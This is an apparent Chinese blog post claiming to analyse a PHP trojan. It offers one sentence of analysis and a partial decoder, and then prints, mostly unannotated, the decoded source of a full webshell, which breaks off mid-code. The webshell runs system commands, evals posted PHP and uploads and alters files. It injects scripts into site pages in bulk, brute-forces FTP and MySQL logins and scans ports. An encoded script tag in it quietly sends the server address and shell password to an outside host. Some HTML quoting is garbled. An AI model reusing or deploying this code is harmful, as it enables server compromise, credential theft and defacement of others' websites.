php 木马的分析(加密破解)
author:一佰互联 2019-05-01   click:491
分析可以知道,此木马经过了base64进行了编码,然后进行压缩。虽然做了相关的保密措施,可是php代码要执行,其最终要生成php源代码,所以写出如下php程序对其进行解码,解压缩,写入文件。
解码解压缩代码如下:
复制代码 代码如下:
<?php
function writetofile($filename, $data)
{ //File Writing
$filenum=@fopen($filename,"w");
if (!$filenum) {
return false;
}
flock($filenum,LOCK_EX);
$file_data=fwrite($filenum,$data);
fclose($filenum);
return true;
}
?>

然后在php的环境下进行运行,会得到php明文文件如下:
复制代码 代码如下:
error_reporting(7);
ob_start();
$mtime = explode(" ", microtime());
$starttime = $mtime[1] + $mtime[0];
@set_time_limit(0);
//非安全模式可以使用上面的函数,超时取消。
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin["check"] = "1";
// 如果需要密码验证,请修改登陆密码
//默认端口表
$hidden = "44997";
$admin["port"] = "80,139,21,3389,3306,43958,1433,5631";
//跳转用的秒
$admin["jumpsecond"] = "1";
//Ftp破解用的连接端口
$alexa = "yes";
//是否显示alexa排名,yes或是no
$admin["ftpport"] = "21";
// 是否允许phpspy本身自动修改编辑后文件的时间为建立时间(yes/no)
$retime = "no";
// 默认cmd.exe的位置,proc_open函数要使用的,linux系统请对应修改.(假设是winnt系统在程序里依然可以指定)
$cmd = "cmd.exe";
// 下面是phpspy显示版权那栏的,因为被很多程序当成作为关键词杀了,鱼寒~~允许自定义吧。还是不懂别改~~

/*===================== 配置结束 =====================*/
$serveru = $_SERVER ["HTTP_HOST"].$_SERVER["PHP_SELF"];
$serverp = $admin["pass"];
$copyurl = base64_decode("PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9");
$copyurll = base64_decode("Jz48L3NjcmlwdD4=");
$onoff = (function_exists("ini_get")) ? ini_get("register_globals") : get_cfg_var("register_globals");
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER["PHP_SELF"];$dis_func = get_cfg_var("disable_functions");
/*===================== 身份验证 =====================*/
if($admin["check"] == "1") {if ($_GET["action"] == "logout") {setcookie ("adminpass", "");echo "<meta http-equiv="refresh" content="0;URL=".$self."">";echo "<span style="" style="""font-size: 12px; font-family: Verdana">注销成功......<p><a href="" href="""".$self."">三秒后自动退出或单击这里退出程序界面 >>></a></span>";exit;}
if ($_POST["do"] == "login") {$thepass=trim($_POST["adminpass"]);if ($admin["pass"] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "<meta http-equiv="refresh" content="0;URL=".$self."">";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."</form>";exit;}}if (isset($_COOKIE["adminpass"])) {if ($_COOKIE["adminpass"] != $admin["pass"]) {loginpage();}} else {loginpage();}}
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}
//mix.dll的代码
$mixdll = "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";

function shelL($command){
global $windows,$disablefunctions;
$exec = "";$output= "";
$dep[]=array("pipe","r");$dep[]=array("pipe","w");
if(is_callable("passthru") && !strstr($disablefunctions,"passthru")){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
elseif(is_callable("system") && !strstr($disablefunctions,"system")){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable("exec") && !strstr($disablefunctions,"exec")) {exec($command,$output);$output = join(" ",$output);$exec= $output;}
elseif(is_callable("shell_exec") && !strstr($disablefunctions,"shell_exec")){$exec= shell_exec($command);}
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get("upload_tmp_dir") ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
return $exec;
}
// 查看PHPINFO
if ($_GET["action"] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看<PHP环境变量>";exit;
}if($_GET["action"] == "nowuser") {$user = get_current_user();
if(!$user) $user = "报告长官,主机变态,无法获取当前进行用户名!";
echo"当前进程用户名:$user";
exit;
}
if(isset($_POST["phpcode"])){eval("?".">$_POST[phpcode]<?");exit;
}
if($action=="mysqldown"){
    $link=@mysql_connect($host,$user,$password);
    if (!$link) {
        $downtmp = "数据库连接失败: " . mysql_error();
    }else{
    $query="select load_file("".$filename."");";
    $result = @mysql_query($query, $link);
    if(!$result){
        $downtmp = "读取失败,可能是文件不存在或是没file权限。<br>".mysql_error();
            }else{
    while ($row = mysql_fetch_array($result)) {
        $filename = basename($filename);
        if($rardown=="yes"){
            $zip = NEW Zip;
            $zipfiles[]=Array("$filename",$row[0]);
            $zip->Add($zipfiles,1);
            $code = $zip->get_file();
            $filename = "".$filename.".rar";
        }else{
            $code = $row[0];
        }
        header("Content-type: application/octet-stream");
        header("Accept-Ranges: bytes");
        header("Accept-Length: ".strlen($code));
        header("Content-Disposition: attachment;filename=$filename");
        echo($code);
        exit;
    }
    }
    }
}
// 在线代理
if (isset($_POST["url"])) {$proxycontents = @file_get_contents($_POST["url"]);echo ($proxycontents) ? $proxycontents : "<body bgcolor="#F5F5F5" style="" style="""font-size: 12px;"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";exit;
}
// 下载文件
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "<script type="text/javascript"><!--
alert("你要下的文件不存在!")
// --></script>";} else {$filename = basename($downfile);$filename_info = explode(".", $filename);$fileext = $filename_info[count($filename_info)-1];header("Content-type: application/x-".$fileext);header("Content-Disposition: attachment; filename=".$filename."");header("Content-Description: PHP Generated Data");header("Content-Length: ".filesize($downfile));@readfile($downfile);exit;}
}
// 直接下载备份数据库
if ($_POST["backuptype"] == "download") {
    @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
    @mysql_select_db($dbname) or die("选择数据库失败");    
    $table = array_flip($_POST["table"]);
    $result = mysql_query("SHOW tables");
    echo ($result) ? NULL : "出错: ".mysql_error();

    $filename = basename($_SERVER["HTTP_HOST"]."_MySQL.sql");
    header("Content-type: application/unknown");
    header("Content-Disposition: attachment; filename=".$filename);
    $mysqldata = "";
    while ($currow = mysql_fetch_array($result)) {
        if (isset($table[$currow[0]])) {
            $mysqldata.= sqldumptable($currow[0]);
            $mysqldata.= $mysqldata." ";
        }
    }
    mysql_close();
    exit;
}

// 程序目录
$pathname=str_replace("\","/",dirname(__FILE__));
$dirpath=str_replace("\","/",$_SERVER["DOCUMENT_ROOT"]);

// 获取当前路径
if (!isset($dir) or empty($dir)) {
    $dir = ".";
    $nowpath = getPath($pathname, $dir);
} else {
    $dir=$_GET["dir"];
    $nowpath = getPath($pathname, $dir);
}

// 判断读写情况
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href="" href="""?action=phpinfo" target="_blank">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == "WIN") ? " | <a href="" href="""?action=reg">注册表操作</a>" : "";

$tb = new FORMS;

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css"><!--
body,td{font-size: 12px;background-color:#000000;color:#eee;
margin: 1px;margin-left:1px;
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323;
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838;
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;
SCROLLBAR-TRACK-COLOR: #383838;}
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
.smlfont {
    font-family: "Verdana", "Tahoma", "宋体";
    font-size: "11px";
}
.INPUT {
    FONT-SIZE: "12px";
    COLOR: "#000000";
    BACKGROUND-COLOR: "#FFFFFF";
    height: "18px";
    border: "1px solid #666666";
    padding-left: "2px";
}
.redfont {COLOR: "#CA0000";}

.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
--></style><style type="text/css" bogus="1">body,td{font-size: 12px;background-color:#000000;color:#eee;
margin: 1px;margin-left:1px;
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323;
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838;
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;
SCROLLBAR-TRACK-COLOR: #383838;}
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
.smlfont {
    font-family: "Verdana", "Tahoma", "宋体";
    font-size: "11px";
}
.INPUT {
    FONT-SIZE: "12px";
    COLOR: "#000000";
    BACKGROUND-COLOR: "#FFFFFF";
    height: "18px";
    border: "1px solid #666666";
    padding-left: "2px";
}
.redfont {COLOR: "#CA0000";}

.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
    for (var i=0;i<form.elements.length;i++) {
        var e = form.elements[i];
        if (e.name != "chkall")
        e.checked = form.chkall.checked; }}
function really(d,f,m,t) {if (confirm(m)) {if (t == 1) {window.location.href="?dir="+d+"&deldir="+f;} else {window.location.href="?dir="+d+"&delfile="+f;}}}
</SCRIPT>
</head>
<title><?php echo"$myneme"?></title>
<body style="table-layout:fixed; word-break:break-all onmouseover=" style="table-layout:fixed; word-break:break-all onmouseover="window.status="设计:幽月 仅限于网站管理员安全检测用,请务使用于非法用途,后果作者概不负责";return true" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
<center>
<?php
//$_SERVER["DOCUMENT_ROOT"]
$tb->tableheader();
$tb->tdbody("<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>".$_SERVER["HTTP_HOST"]."</b></td><td align="center">".date("Y年m月d日 h:i:s",time())."</td><td align="right"><b>".gethostbyname($_SERVER["SERVER_NAME"])."</b></td></tr></table>","center","top");
$tb->tdbody("<a href="?dir=".$dirpath."" href="?dir=".$dirpath."">根目录</a> | <a href="?action=dir" href="?action=dir">Shell目录</a> | <a href="?action=phpenv" href="?action=phpenv">环境变量</a> | <a href="?action=proxy" href="?action=proxy">在线代理</a>".$reg.$phpinfo." | <a href="?action=shell" href="?action=shell">WebShell</a> | <a href="?action=crack" href="?action=crack">杂项破解</a> | <a href="?action=mix" href="?action=mix">解压mix.dll</a> | <a href="?action=logout" href="?action=logout">注销登录</a>");
$tb->tdbody("<a href="?action=plgm" href="?action=plgm">批量挂马</a> | <a href="?action=downloads" href="?action=downloads">Http文件下载</a> | <a href="?action=search&dir=".$dir."" href="?action=search&dir=".$dir."">文件查找</a> | <a href="?action=eval" href="?action=eval">执行php脚本</a> | <a href="?action=sql" href="?action=sql">执行SQL语句</a> | <a href="?action=mysqlfun" href="?action=mysqlfun">Func反弹Shell</a> | <a href="?action=sqlbak" href="?action=sqlbak">MySQL备份</a> | <a href="?action=SUExp" href="?action=SUExp">Serv-U提权</a>");
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?
$tb->headerform(array("method"=>"GET","content"=>"<p>程序路径: ".$pathname."<br>当前目录(".$dir_writeable.",".substr(base_convert(@fileperms($nowpath),10,8),-4)."): ".$nowpath."<br>跳转目录: ".$tb->makeinput("dir","".$nowpath."","","text","80")." ".$tb->makeinput("","确定","","submit")." 〖支持绝对路径和相对路径〗"));

$tb->headerform(array("action"=>"?dir=".urlencode($dir),"enctype"=>"multipart/form-data","content"=>"上传文件到当前目录: ".$tb->makeinput("uploadfile","","","file")." ".$tb->makeinput("doupfile","确定","","submit").$tb->makeinput("uploaddir",$dir,"","hidden")));

$tb->headerform(array("action"=>"?action=editfile&dir=".urlencode($dir),"content"=>"新建文件在当前目录: ".$tb->makeinput("editfile")." ".$tb->makeinput("createfile","确定","","submit")));

$tb->headerform(array("content"=>"新建目录在当前目录: ".$tb->makeinput("newdirectory")." ".$tb->makeinput("createdirectory","确定","","submit")));
?>
</table>
<hr width="775" noshade>
<?php
/*===================== 执行操作 开始 =====================*/
echo "<p><b> ";
// 删除文件
if (!empty($delfile)) {
    if (file_exists($delfile)) {
        echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!";
    } else {
        echo basename($delfile)." 文件已不存在!";
    }
}

// 删除目录
elseif (!empty($deldir)) {
    $deldirs="$dir/$deldir";
    if (!file_exists("$deldirs")) {
        echo "$deldir 目录已不存在!";
    } else {
        echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!";
    }
}

// 创建目录
elseif (($createdirectory) AND !empty($_POST["newdirectory"])) {
    if (!empty($newdirectory)) {
        $mkdirs="$dir/$newdirectory";
        if (file_exists("$mkdirs")) {
            echo "该目录已存在!";
        } else {
            echo (@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!";
            @chmod("$mkdirs",0777);
        }
    }
}

// 上传文件
elseif ($doupfile) {
    echo (@copy($_FILES["uploadfile"]["tmp_name"],"".$uploaddir."/".$_FILES["uploadfile"]["name"]."")) ? "上传成功!" : "上传失败!";
}
elseif($action=="mysqlup"){
    $filename = $_FILES["upfile"]["tmp_name"];
    if(!$filename) {
        echo"没有选择要上传的文件。。";
    }else{
    $shell = file_get_contents($filename);
    $mysql = bin2hex($shell);
    if(!$upname) $upname = $_FILES["upfile"]["name"];
    $shell = "select 0x".$mysql." from ".$database." into DUMPFILE "".$uppath."/".$upname."";";
    $link=@mysql_connect($host,$user,$password);
    if(!$link){
        echo "登陆失败".mysql_error();
    }else{
        $result = mysql_query($shell, $link);
        if($result){
            echo"操作成功.文件成功上传到".$host.",文件名为".$uppath."/".$upname."..";
        }else{
                echo"上传失败 原因:".mysql_error();
            }
        }
    }

}
elseif($action=="mysqldown"){
    if(!empty($downtmp)) echo $downtmp;
}
// 编辑文件
elseif ($_POST["do"] == "doeditfile") {
    if (!empty($_POST["editfilename"])) {
if(!file_exists($editfilename)) unset($retime);
    if($time==$now) $time = @filemtime($editfilename);
$time2 = @date("Y-m-d H:i:s",$time);
        $filename="$editfilename";
        @$fp=fopen("$filename","w");
        if($_POST["change"]=="yes"){
        $filecontent = "?".">".$_POST["filecontent"]."<?";
        $filecontent = gzdeflate($filecontent);
$filecontent = base64_encode($filecontent);
$filecontent = "<?php /* 代码由浅蓝的辐射鱼加密! */ eval(gzinflate(base64_decode("$filecontent"))); "."?>";
        }else{
        $filecontent = $_POST["filecontent"];
        }
        echo $msg=@fwrite($fp,$filecontent) ? "写入文件成功!" : "写入失败!";
        @fclose($fp);
        if($retime=="yes"){
echo" 鱼鱼自动操作:";
echo $msg=@touch($filename,$time) ? "修改文件为".$time2."成功!" : "修改文件时间失败!";
        }
    } else {
        echo "请输入想要编辑的文件名!";
    }
}
//文件下载
elseif ($_POST["do"] == "downloads") {
    $contents = @file_get_contents($_POST["durl"]);
    if(!$contents){
    echo"无法读取要下载的数据";
    }
    elseif(file_exists($path)){
    echo"很抱歉,文件".$path."已经存在了,请更换保存文件名。";
    }else{
$fp = @fopen($path,"w");
    echo $msg=@fwrite($fp,$contents) ? "下载文件成功!" : "下载文件写入时失败!";
    @fclose($fp);
    }
}
elseif($_POST["action"]=="mix"){
    if(!file_exists($_POST["mixto"])){
    $tmp = base64_decode($mixdll);
    $tmp = gzinflate($tmp);
    $fp = fopen($_POST["mixto"],"w");
    echo $msg=@fwrite($fp,$tmp) ? "解压缩成功!" : "此目录不可写吧?!";
    fclose($fp);
}else{
    echo"不是吧?".$_POST["mixto"]."已经存在了耶~";
}
}
// 编辑文件属性
elseif ($_POST["do"] == "editfileperm") {
    if (!empty($_POST["fileperm"])) {
        $fileperm=base_convert($_POST["fileperm"],8,10);
        echo (@chmod($dir."/".$file,$fileperm)) ? "属性修改成功!" : "修改失败!";
        echo " 文件 ".$file." 修改后的属性为: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
    } else {
        echo "请输入想要设置的属性!";
    }
}

// 文件改名
elseif ($_POST["do"] == "rename") {
    if (!empty($_POST["newname"])) {
        $newname=$_POST["dir"]."/".$_POST["newname"];
        if (@file_exists($newname)) {
            echo "".$_POST["newname"]." 已经存在,请重新输入一个!";
        } else {
            echo (@rename($_POST["oldname"],$newname)) ? basename($_POST["oldname"])." 成功改名为 ".$_POST["newname"]." !" : "文件名修改失败!";
        }
    } else {
        echo "请输入想要改的文件名!";
    }
}
elseif ($_POST["do"] == "search") {
if(!empty($oldkey)){
echo"<span class="redfont">查找关键词:[".$oldkey."],下面显示查找的结果:";
    if($type2 == "getpath"){
    echo"鼠标移到结果文件上会有部分截取显示.";
}
echo"</span><br><hr width="775" noshade>";
find($path);
}else{
echo"你要查虾米?到底要查虾米呢?有没有虾米要你查呢?";
}
}
elseif ($_GET["action"]=="plgmok") {
dirtree($_POST["dir"],$_POST["mm"]);
}
elseif ($_GET["action"] == "plgm") {
    $action = "?action=plgmok";
    $gm = "<script src="http://127.0.0.1" src="http://127.0.0.1"></script>";
    $tb->tableheader();
    $tb->formheader($action,"批量挂马");
    $tb->tdbody("网站批量挂马程序php版","center");
    $tb->tdbody("文件位置: ".$tb->makeinput("dir","".$_SERVER["DOCUMENT_ROOT"]."","","text","60")."<br>要挂代码:".$tb->maketextarea("mm",$gm,"50","5")."".$tb->makehidden("do","批量挂马")."<br>".$tb->makeinput("submit","开始挂马","","submit"),"center","1","35");
    echo "</form>";
    $tb->tablefooter();
}//end plgm
// 克隆时间
elseif ($_POST["do"] == "domodtime") {
    if (!@file_exists($_POST["curfile"])) {
        echo "要修改的文件不存在!";
    } else {
        if (!@file_exists($_POST["tarfile"])) {
            echo "要参照的文件不存在!";
        } else {
            $time=@filemtime($_POST["tarfile"]);
            echo (@touch($_POST["curfile"],$time,$time)) ? basename($_POST["curfile"])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
        }
    }
}

// 自定义时间
elseif ($_POST["do"] == "modmytime") {
    if (!@file_exists($_POST["curfile"])) {
        echo "要修改的文件不存在!";
    } else {
        $year=$_POST["year"];
        $month=$_POST["month"];
        $data=$_POST["data"];        
        $hour=$_POST["hour"];
        $minute=$_POST["minute"];
        $second=$_POST["second"];
        if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
            $time=strtotime("$data $month $year $hour:$minute:$second");
            echo (@touch($_POST["curfile"],$time,$time)) ? basename($_POST["curfile"])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
        }
    }
}
elseif($do =="port"){
        $tmp = explode(",",$port);
        $count = count($tmp);
    for($i=$first;$i<$count;$i++){
            $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
            if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."<br>";
    }
}
/*
这里代码写得很杂,说实话我自己都不知道写了什么。
好在能用,我就没管了,假设有人看到干脆重写吧。*/
elseif ($do == "crack") {//反正注册为全局变量了。
    if(@file_exists($passfile)){
        $tmp = file($passfile);
        $count = count($tmp);
        if(empty($onetime)){
            $onetime = $count;
            $turn="1";
        }else{
            $nowturn = $turn+1;
            $now = $turn*$onetime;
            $tt = intval(($count/$onetime)+1);
        }
        if($turn>$tt or $onetime>$count){
            echo"超过字典容量了耶~要是破解最后进程的,很抱歉失败。";
            }else{
                $first = $onetime*($turn-1);
                for($i=$first;$i<$now;$i++){
                    if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i]));
                    else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
                if($sa)
                    {
                    $t = "获取".$user."的密码为".$tmp[$i]."";
                    }
            }
            if(!$t){
                echo "<meta http-equiv="refresh" content="".$admin[jumpsecond].";URL=".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&ctype=".$ctype.""><span style="" style="""font-size: 12px; font-family: Verdana"><a href="" href="""".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&type=".$ctype."">字典总共".$count."个,现在从".$first."到".$now.",".$admin[jumpsecond]."秒后进行这".$onetime."个密码的试探. >>></a><br>全历此次".$type."的破解需要".$tt."次,现在是第".$turn."次解密。</span>";
    }
    else {
        echo"$t";
        }
            }
}else{
            echo"字典文件不存在,请确定。";
            }
}
elseif($do =="port"){
    if(!eregi("-",$port)){
        $tmp = explode(",",$port);
        $count = count($tmp);
        $first = "1";
    }else{
        $tmp = explode("-",$port);
        $first = $tmp[0];
        $count = $tmp[1];

    }
    for($i=$first;$i<$count;$i++){
            if(!eregi("-",$port)){
            $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
            if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."<br>";
            }else{
                $fp = @fsockopen($host, $i, $errno, $errstr, 1);
                if($fp) echo"发现".$host."主机打开了端口".$i."<br>";
            }
        }

    }
// 连接MYSQL
elseif ($connect) {
    if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
        echo "数据库连接成功!";
        mysql_close();
    } else {
        echo mysql_error();
    }
}

// 执行SQL语句
elseif ($_POST["do"] == "query") {
    @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
    @mysql_select_db($dbname) or die("选择数据库失败");
    $result = @mysql_query($_POST["sql_query"]);
    echo ($result) ? "SQL语句成功执行!" : "出错: ".mysql_error();
    mysql_close();
}

// 备份操作
elseif ($_POST["do"] == "backupmysql") {
    if (empty($_POST["table"]) OR empty($_POST["backuptype"])) {
        echo "请选择欲备份的数据表和备份方式!";
    } else {
        if ($_POST["backuptype"] == "server") {
            @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
            @mysql_select_db($dbname) or die("选择数据库失败");    
            $table = array_flip($_POST["table"]);
            $filehandle = @fopen($path,"w");
            if ($filehandle) {
                $result = mysql_query("SHOW tables");
                echo ($result) ? NULL : "出错: ".mysql_error();
                while ($currow = mysql_fetch_array($result)) {
                    if (isset($table[$currow[0]])) {
                        sqldumptable($currow[0], $filehandle);
                        fwrite($filehandle," ");
                    }
                }
                fclose($filehandle);
                echo "数据库已成功备份到 <a href="" href="""".$path."" target="_blank">".$path."</a>";
                mysql_close();
            } else {
                echo "备份失败,请确认目标文件夹是否具有可写权限!";
            }
        }
    }
}
elseif($downrar) {
    if (!empty($dl)) {
        if(eregi("unzipto:",$localfile)){
        $path = "".$dir."/".str_replace("unzipto:","",$localfile)."";
        $zip = new Zip;
        $zipfile=$dir."/".$dl[0];
        $array=$zip->get_list($zipfile);
        $count=count($array);
        $f=0;
        $d=0;
        for($i=0;$i<$count;$i++) {
            if($array[$i][folder]==0) {
                if($zip->Extract($zipfile,$path,$i)>0) $f++;
            }
            else $d++;
        }
        if($i==$f+$d) echo "$dl[0] 解压到".$path."成功<br>($f 个文件 $d 个目录)";
        elseif($f==0) echo "$dl[0] 解压到".$path."失败";
        else echo "$dl[0] 未解压完整<br>(已解压 $f 个文件 $d 个目录)";
        }else{
    $zipfile="";
    $zip = new Zip;
    for($k=0;isset($dl[$k]);$k++)
        {
            $zipfile=$dir."/".$dl[$k];
            if(is_dir($zipfile))
            {
                unset($zipfilearray);
                addziparray($dl[$k]);
                for($i=0;$zipfilearray[$i];$i++)
                {
                    $filename=$zipfilearray[$i];
                    $filesize=@filesize($dir."/".$zipfilearray[$i]);
                    $fp=@fopen($dir."/".$filename,rb);
                    $zipfiles[]=Array($filename,@fread($fp,$filesize));
                    @fclose($fp);
                }
            }
            else
            {
                $filename=$dl[$k];
                $filesize=@filesize($zipfile);
                $fp=@fopen($zipfile,rb);
                $zipfiles[]=Array($filename,@fread($fp,$filesize));
                @fclose($fp);
            }
        }
        $zip->Add($zipfiles,1);
        $code = $zip->get_file();
        $ck = "_QQ44997_".date("Y-m-d",time())."";
        if(empty($localfile)){
        header("Content-type: application/octet-stream");
        header("Accept-Ranges: bytes");
        header("Accept-Length: ".strlen($code));
        header("Content-Disposition: attachment;filename=".$_SERVER["HTTP_HOST"]."".$ck."_Files.zip");
        echo $code;
        exit;
        }else{
         $fp = @fopen("".$dir."/".$localfile."","w");
         echo $msg=@fwrite($fp,$code) ? "压缩保存".$dir."/".$localfile."本地成功!!" : "目录".$dir."无可写权限!";
         @fclose($fp);
        }
        }
    } else {
        echo "请选择要打包下载的文件!";
    }
}
// Shell.Application 运行程序
elseif(($_POST["do"] == "programrun") AND !empty($_POST["program"])) {
    $shell= &new COM("Sh"."el"."l.Appl"."ica"."tion");
    $a = $shell->ShellExecute($_POST["program"],$_POST["prog"]);
